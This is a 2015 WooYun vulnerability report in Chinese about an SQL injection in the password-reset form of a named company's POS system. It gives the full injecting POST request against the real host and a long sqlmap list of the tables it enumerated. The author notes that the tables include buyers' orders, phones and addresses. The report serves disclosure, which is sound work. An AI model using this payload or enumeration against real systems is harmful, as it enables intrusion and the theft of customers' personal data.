当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134969

漏洞标题:某大型商贸公司SQL注入(涉及天猫C店铺5W订单/泄露大量代理商信息/泄露大量买家信息)

相关厂商:北京市源烽世纪商贸有限责任公司

漏洞作者: 路人甲

提交时间:2015-08-18 12:11

修复时间:2015-10-02 12:12

公开时间:2015-10-02 12:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

从一个pos店铺管理系统重置密码处发现注入,到发现十几裤,分析了下内容,可以实现查看天猫C店各种数据,比如,订单,评价,还有买家信息,电话,地址,这个裤子也很强大。万一找到你家呢。。
第二个是自己商品的详细数据,这个也是竞争的利器
第三就是各种代理商的数据了,数据量实在太大,只跑部分代表可能实现。
http://sap.karra.com.cn/Account/PwdChange.aspx 重置密码处发现SQL注入,

漏洞证明:

POST /Account/PwdChange.aspx HTTP/1.1
Host: sap.karra.com.cn
Content-Length: 174
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://sap.karra.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://sap.karra.com.cn/Account/PwdChange.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
__VIEWSTATE=%2FwEPDwUKMTA1NDkzNTkwMmRkbdVCy9Kp551SUrWeHfcXBOYLkvS6b79HnY1MNZMILbo%3D&txtUserName=aaaa%27+&txtOPwd=123456&txtNPwd=123456&txtNPwd1=123456&btnSubmit=%CC%E1%BD%BB

数据包

db.png

2222.png

444.png

chaping.png

搜狗截图15年08月18日1106_11.png

搜狗截图15年08月18日1112_14.png

搜狗截图15年08月18日1113_15.png

搜狗截图15年08月18日1119_17.png

| HS_BORROW                     |
| HS_BUMEN                      |
| HS_BX                         |
| HS_BXNAME                     |
| HS_DIANPU                     |
| HS_DIANPUBX                   |
| HS_KFCKD                      |
| HS_KFKC                       |
| HS_KFKCMX                     |
| HS_MLK                        |
| HS_MLMINGXI                   |
| HS_MLPRICE                    |
| HS_PHDZ                       |
| HS_SCDZMX                     |
| HS_SCMLDZ                     |
| HS_SCMLKMX                    |
| HS_YYBORROW                   |
| HS_YYGL                       |
| HS_YYK                        |
| HS_YYKC                       |
| HS_YYNO                       |
| HS_YYXSXS                     |
| HS_YYZK                       |
| HS_ZKD                        |
| HT_DETAIL                     |
| HT_MANAGER                    |
| HT_NUM_DETAIL                 |
| IMG                           |
| IMGURL                        |
| IMGURL_TEST                   |
| IMG_LOG                       |
| IMG_STORE                     |
| INFO_TABLE                    |
| INSIDE_SALE                   |
| ISALOG                        |
| JIZHANG_TEMP                  |
| JOB_INFO                      |
| JOS_REMOVEDETAIL              |
| JOS_REMOVENO                  |
| KARRA_LOG                     |
| KARRA_PRODUCT                 |
| KARRA_PRODUCT_BAK             |
| KARRA_PRODUCT_OLD             |
| KARRA_PRODUCT_XZ              |
| KARRA_TB_ZHANGDAN_BAK         |
| MAXDH                         |
| MDIMG                         |
| MD_INPUT                      |
| MICROSOFTDTPROPERTIES         |
| MLSC                          |
| MONTH_REPORT_IT               |
| NEWSALE_BIDUI                 |
| NEWSALE_BS_NO                 |
| NEWSALE_BS_NO_BAK             |
| NEWSALE_BS_NO_TMP             |
| NEWSALE_BS_STORE              |
| NEWSALE_BS_STORE_BAK          |
| NEWSALE_BS_STORE_TMP          |
| NEWSALE_FDJHCHD               |
| NEWSALE_FDJHCHD_BAK           |
| NEWSALE_FDYHD                 |
| NEWSALE_FDYHD_BAK             |
| NEWSALE_FLBFD                 |
| NEWSALE_FLSUMSTORE            |
| NEWSALE_FL_STORE              |
| NEWSALE_FXLEI                 |
| NEWSALE_HP_DAILYREPORT        |
| NEWSALE_INFO                  |
| NEWSALE_JF                    |
| NEWSALE_JFBS                  |
| NEWSALE_JFKNO                 |
| NEWSALE_JF_BAK                |
| NEWSALE_KAOQIN                |
| NEWSALE_KDD                   |
| NEWSALE_LIUSHUI               |
| NEWSALE_MAXSTORE              |
| NEWSALE_OTHERBRAND            |
| NEWSALE_OTHERBRANDSALE        |
| NEWSALE_OTHERBRANDSALE_BAK    |
| NEWSALE_PD                    |
| NEWSALE_PLSQL_KCBIDUI         |
| NEWSALE_QUAN                  |
| NEWSALE_ROAD                  |
| NEWSALE_SCHD                  |
| NEWSALE_SCHDNEW               |
| NEWSALE_STORELIUSHUI          |
| NEWSALE_STORELIUSHUI_20140320 |
| NEWSALE_STORELIUSHUI_BAK      |
| NEWSALE_STORELS               |
| NEWSALE_SUMSALE               |
| NEWSALE_SUMSALE_BAK           |
| NEWSALE_SUMSALE_VIP           |
| NEWSALE_SUMSTORE              |
| NEWSALE_SUMSTORE_20130531     |
| NEWSALE_SUMSTORE_BAK          |
| NEWSALE_SUMSTORE_HB           |
| NEWSALE_SUMSTORE_HB1          |
| NEWSALE_SYJH                  |
| NEWSALE_TASK                  |
| NEWSALE_TCBL                  |
| NEWSALE_TEST_SUN              |
| NEWSALE_THHSQ                 |
| NEWSALE_TJ                    |
| NEWSALE_TJ_KC                 |
| NEWSALE_TMDD                  |
| NEWSALE_TMSUMSTORE            |
| NEWSALE_TM_TMP                |
| NEWSALE_UNITDAILY             |
| NEWSALE_UNITDAILY_BAK         |
| NEWSALE_UNITEMPLOYEE          |
| NEWSALE_UNITEMPLOYEE_BAK      |
| NEWSALE_UNITYEJI              |
| NEWSALE_VIPCARD_VALID         |
| NEWSALE_XXX                   |
| NEWSALE_YFK_LIUSHUI           |
| NEWSALE_YFK_NO                |
| NEWSALE_YFK_NO_BAK            |
| NEW_IMG_STORE                 |
| NEW_UPDOC                     |
| NOOTBOOK                      |
| O_STORE                       |
| PDINPUT                       |
| PD_LIUSHUI_TABLE              |
| PD_SHEET                      |
| PD_TAITOU_TABLE               |
| PERSONAL_DAILY_IT             |
| PERSONAL_MONTH_IT             |
| PERSONAL_WEEK_IT              |
| PF_TYPE_CODE                  |
| PLAN_GC                       |
| PLAN_TABLE                    |
| PLOYEE                        |
| PLSQL_TEST                    |
| PLSQL_TEST2                   |
| PLSQL_TEST3                   |
| POS_NEXTWEEK_CL               |
| POS_SCHD_MD                   |
| POS_TASK_RESULT               |
| POS_WEEK_OTHERBRANDSALE       |
| POS_WEEK_RESULTS              |
| PPDETAIL                      |
| PRICE_CHANGE                  |
| PRODUCT                       |
| PRODUCT_IMG                   |
| PRODUCT_LIST                  |
| PRODUCT_TEMP                  |
| QCTZD                         |
| REGION_NO                     |
| REGION_NODX                   |
| REGION_S_NO                   |
| REGION_S_NODX                 |
| REPAIR                        |
| RL_BUMEN                      |
| RL_SOURCE                     |
| RL_YGXX                       |
| ROAD_WARE                     |
| SALE                          |
| SALESPERSON                   |
| SAOMIAO_BARCODE               |
| SAP_CUSTOMER_YD               |
| SAP_CUS_SERS                  |
| SAP_CY_BASEINFO               |
| SAP_FH_SEQUENCE               |
| SAP_HDDETAIL                  |
| SAP_HUOWEI                    |
| SAP_IMAGES_LIST_TMP           |
| SAP_KARRA_QUERY_LOG           |
| SAP_KUNNR                     |
| SAP_KUNNR_DUIYING             |
| SAP_LGORT_NAME                |
| SAP_MAIL_SENDSETS             |
| SAP_MARA_PRODUCT              |
| SAP_MATNR_SSPCORDATE          |
| SAP_POS20_KC                  |
| SAP_POS20_KC_DETAIL           |
| SAP_POSLOG                    |
| SAP_POS_CATCHSQL              |
| SAP_POS_SYNC_DAILY            |
| SAP_POS_TB_WEEK_SALESUM       |
| SAP_PRECARD                   |
| SAP_REMOVEDETAIL              |
| SAP_REMOVEDETAIL_TMP          |
| SAP_REMOVENO                  |
| SAP_REMOVENO_TMP              |
| SAP_SCHD                      |
| SAP_SHENGCHANCAIGOU           |
| SAP_TAOBAO_PINT               |
| SAP_TB_TMP_FDYHSP             |
| SAP_YFKLIUSHUI                |
| SAP_ZMARA                     |
| SAP_ZSAP_POS23_TB             |
| SC_IN                         |
| SC_OUT                        |
| SC_UNSE                       |
| SC_USE                        |
| SHOP                          |
| SMP_VDS_REPOS_VERSION         |
| SMP_VDS_SESSIONS_TABLE        |
| SOFTWARE_USE                  |
| STORE_USE                     |
| STUDENTS                      |
| TAOBAO_ORDER                  |
| TAOBAO_REFUND                 |
| TAOBAO_TMP_DATA_SEL           |
| TAOBAO_TOKEN                  |
| TAOBAO_TRADE                  |
| TB_CWJS                       |
| TB_FENKU                      |
| TB_ORDERLIST                  |
| TB_VIP                        |
| TB_XSD                        |
| TB_ZHANGDAN                   |
| TB_ZHANGDAN_BAK               |
| TEMPUTER                      |
| TEST                          |
| TEST1                         |
| TESTING                       |
| TEST_A                        |
| TIXING                        |
| TM_HZ                         |
| TM_JSJUAN                     |
| TM_QMX                        |
| TM_QUAN                       |
| TM_S_NO                       |
| TM_VIPARCHIVES                |
| TM_VIPJF                      |
| TM_XSD                        |
| TNAME_ARG                     |
| TOUPIAO                       |
| TP_DETAIL                     |
| UNIT_NAME                     |
| UPLOADLOG                     |
| URL_TODAY_IT                  |
| USR_FUNCTION                  |
| USR_TAB                       |
| USR_TAB_BAK                   |
| USR_TAB_OLD                   |
| VIPLIPIN                      |
| VIP_JF                        |
| VIP_REGISTER_DETAIL           |
| VIP_REGISTER_DETAIL_BAK       |
| WB_RECEIVE                    |
| WB_REMOVE                     |
| WB_REMOVE_BAK                 |
| WB_SALE                       |
| WB_SEND                       |
| WEATHER                       |
| WEB_IMG                       |
| WEB_LINK                      |
| WEB_VISIT                     |
| WEEK_REPORT_IT                |
| WEIXIN_SENDMSG                |
| WEIXIN_VIP_DUIHUAN_JF         |
| WLDLIUSHUI                    |
| WLDLIUSHUI_TMP                |
| WROX_BOOK                     |
| WXZKSQD                       |
| WX_USE                        |
| WX_USE_20130607               |
| XH_IN                         |
| XH_OUT                        |
| XH_UNSE                       |
| XH_USE                        |
| XIUGAI                        |
| YF_CW_DAILI                   |
| YF_CW_DETAIL                  |
| YF_CW_TYPE                    |
| YINGYUNBU                     |
| YINGYUNBU1                    |
| YYK                           |
| YY_BACK                       |
| YY_BACK_BAK                   |
| ZAIXIAN                       |
| ZHIDU                         |
| ZKSQD                         |
| ZK_CARDNO                     |
| ZK_S_NO                       |
| ZK_S_NO2                      |
| ZLK_DUIYING                   |
| ZLK_OUTIN                     |
| ZLK_PRODUCT                   |
| ZLK_USE                       |
| ZSAP_SYNC_PD_DATA             |
| ZWD_KC                        |
| ZWD_PRO                       |
| ZWD_SALE                      |
| ZZ_IN                         |
| ZZ_USE                        |
| ZZ_USEBAK                     |
+-------------------------------+
[10:59:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 379 times
[10:59:54] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\o
tput\sap.karra.com.cn'

当前库子部门表,实在太多了。而且名称很难猜是代表具体什么内容。。

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝